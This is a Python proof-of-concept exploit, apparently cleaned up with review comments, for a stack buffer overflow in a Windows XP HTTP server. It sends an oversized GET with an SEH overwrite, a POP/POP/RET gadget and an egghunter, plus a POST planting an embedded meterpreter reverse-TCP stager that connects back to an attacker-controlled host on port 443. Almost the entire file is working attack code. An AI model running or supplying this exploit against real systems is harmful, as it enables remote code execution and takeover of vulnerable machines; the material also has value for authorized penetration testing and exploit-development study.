# Tested on Windows XP SP3 (x86)
# The application requires to have the web server enabled.

#!/usr/bin/python
import socket, threading, struct

# (the six lines above are a truncated duplicate of the header below, left over from a paste; the script proper starts at the next comment)
# The target application's web server component must be enabled: this PoC talks to it over HTTP on the port configured below.

#!/usr/bin/python
import socket, threading, struct

# Target of both requests: the vulnerable application's HTTP listener.
# Change these to point at the machine under test.
host, port = "192.168.228.155", 80

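# Stager generated with:
#   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.158 LPORT=443 -f py
# It is bound to that handler: the bytes \xc0\xa8\xe4\x9e (192.168.228.158) and
# \x02\x00\x01\xbb (AF_INET, port 0x01bb = 443) are pushed inside it. Regenerate it
# with msfvenom for any other LHOST/LPORT instead of patching bytes by hand.
_STAGER = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
    b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
    b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
    b"\xff\xd5\x6a\x0a\x68\xc0\xa8\xe4\x9e\x68\x02\x00\x01"
    b"\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
    b"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
    b"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
    b"\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
    b"\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
    b"\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
    b"\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
    b"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
    b"\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
    b"\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
    b"\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
    b"\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
)


def _build_egghunter_request():
    """Return the raw HTTP POST (bytes) that parks the egg-tagged stager.

    Body layout, in order: the egg "W00T" twice (the 8-byte marker the
    egghunter sent by send_exploit_request searches for), 16 NOP bytes,
    the stager, then 0x42 padding so the body is exactly 100000 bytes.
    Everything is built as bytes so the same code runs on Python 2 and 3
    (a str payload would be re-encoded or rejected by send() on Python 3).
    """
    body = b"W00T" * 2
    body += b"\x90" * 16  # NOP slide between the egg and the stager
    body += _STAGER
    body += b"\x42" * (100000 - len(body))

    # Advertise 1000 bytes more than are actually sent. NOTE(review):
    # presumably this keeps the server waiting for the rest of the body, so
    # the buffer stays in memory for the egghunter to find — verify.
    content_length = len(body) + 1000

    request = b"POST / HTTP/1.1\r\n"
    request += b"Content-Type: multipart/form-data; boundary=evilBoundary\r\n"
    request += b"Content-Length: " + str(content_length).encode("ascii") + b"\r\n"
    request += b"\r\n"
    request += body
    return request


def send_egghunter_request():
    """Deliver the egg-tagged stager to host:port (module globals) over HTTP.

    This only places the payload in the web server's memory; control is
    transferred to it by the egghunter carried in send_exploit_request.
    sendall() is used so the ~100 KB request is never truncated by a partial
    send(). The recv() afterwards discards whatever comes back; it blocks
    until the server answers or the connection drops, which keeps the POST
    open in the meantime. The socket is always closed. Returns None.
    """
    request = _build_egghunter_request()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.sendall(request)
        s.recv(1024)  # response content is irrelevant; this is only a wait
    finally:
        s.close()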

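def _build_exploit_request():
    """Return the raw HTTP GET (bytes) whose oversized URI overflows the server.

    URI layout: 2495 NOPs, a 4-byte short jump (jmp +6), the address of a
    POP ESI / POP EBX / RETN gadget in libspp, the 32-byte egghunter that
    scans for "W00TW00T", then 0x41 padding up to 6000 bytes. NOTE(review):
    short jump followed by pop/pop/ret is the usual nSEH/SEH overwrite
    shape — confirm against the crash before changing the offset.
    """
    uri = b"\x90" * 2495
    uri += b"\xeb\x06\x90\x90"  # short jump forward over the gadget address
    uri += struct.pack("<L", 0x1014fdef)  # POP ESI; POP EBX; RETN - libspp

    # ./egghunter.rb -b "\x00\x0a\x0b" -e "W00T" -f py
    uri += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
    uri += b"\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75"
    uri += b"\xea\xaf\x75\xe7\xff\xe7"
    uri += b"\x41" * (6000 - len(uri))

    # Request line and headers. There is no space between the URI and
    # "HTTP/1.1" and no terminating blank line; both are kept byte-for-byte
    # from the original PoC. NOTE(review): whether the server needs either
    # is not established here — confirm before "fixing" them.
    request = b"GET /" + uri + b"HTTP/1.1" + b"\r\n"
    request += b"Host: " + host.encode("ascii") + b"\r\n"
    request += (b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) "
                b"Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\r\n")
    request += (b"Accept: text/html,application/xhtml+xml,"
                b"application/xml;q=0.9,*/*;q=0.8\r\n")
    request += b"Accept-Language: en-US,en;q=0.5\r\n"
    request += b"Accept-Encoding: gzip, deflate\r\n"
    request += b"Connection: keep-alive\r\n"
    return request


def send_exploit_request():
    """Send the overflowing GET to host:port (module globals).

    Triggers the overflow; the egghunter in the URI then locates the stager
    that send_egghunter_request planted. No response is read. sendall() is
    used so the 6 KB request cannot be cut short by a partial send(), and
    the socket is closed even if connect() or the send fails. Returns None.
    """
    request = _build_exploit_request()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.sendall(request)
    finally:
        s.close()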

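if __name__ == "__main__":
    # The stager has to be resident in the server's memory by the time the
    # egghunter runs, so it is delivered on its own thread while the
    # overflow request goes out on the main thread. There is no handshake
    # between the two; NOTE(review): this is timing-dependent, and the
    # meterpreter handler for the LHOST/LPORT baked into the stager must be
    # listening before this is run.
    t = threading.Thread(target=send_egghunter_request)
    t.start()
    print("[+] Thread started.")  # print() form runs on Python 2 and 3
    send_exploit_request()
    t.join()  # exit only once the egghunter connection has also finished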